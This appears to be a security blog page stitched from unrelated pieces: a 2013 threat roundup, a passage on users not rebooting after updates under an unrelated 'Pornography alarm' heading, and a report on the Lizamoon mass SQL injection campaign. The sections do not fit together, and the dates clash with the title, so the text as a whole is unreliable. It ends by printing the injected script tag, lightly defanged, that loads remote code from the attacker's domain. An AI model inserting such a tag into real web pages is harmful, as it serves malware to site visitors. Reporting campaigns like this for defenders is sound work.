A turbulent beginning of 2013
We can determine threats on two major fronts: Ruby on Rails, Java and Microsoft’s Internet Explorer form the first one – all web-related. And then there are flaws in Foxit Reader and Microsoft’s Windows RT, which also got in the line of fire.
Pornography alarm or reboot?
But there is another pitfall: Most computer users do not realize that many software updates do not only need to be installed, but the computer needs to be restarted for the updates and patches to take effect. The combination of ignorance, impatience and laziness is fatal in this sense.
The safety of the PC stands and falls with the combination of your security software, the updates of the OS and other software and especially of your own behavior. Very often, the Achilles heel of PC security is human ‘procrastination’.
Users often don’t want to turn the PC or laptop off completely, because the startup takes too long. The endlessly used method to simply closing the laptop or choosing hibernation state of the PC is a phenomenon that most readers will be familiar with. The use of tablet computers even made it worse: those devices are ready to be used in an instant and therefore have made us even more impatient.
It never stays quiet on the internet and new attacks or malware are seen every day. The last week however we saw an interesting mass SQL injection attack, referred to as Lizamoon, which was spreading and has infected several millions of URLs last week (March 29 until April 4). Even after a week, thousands of comprised websites don’t seem to be cleaned up, yet.
What are we talking about?
The mentioned attack uses SQL injection techniques to insert rogue code into the databases of websites. SQL injection is a code injection technique that misuses available functionality that is not filtered away properly. In other words: The vulnerability is present when user input is not correctly filtered for escape characters embedded in SQL statements or if the input is not strongly typed and by this unexpectedly executed (cf.: Wikipedia).
The following code was injected into a large number of websites:
<script src=hxxp://lizamoon . com / ur . php >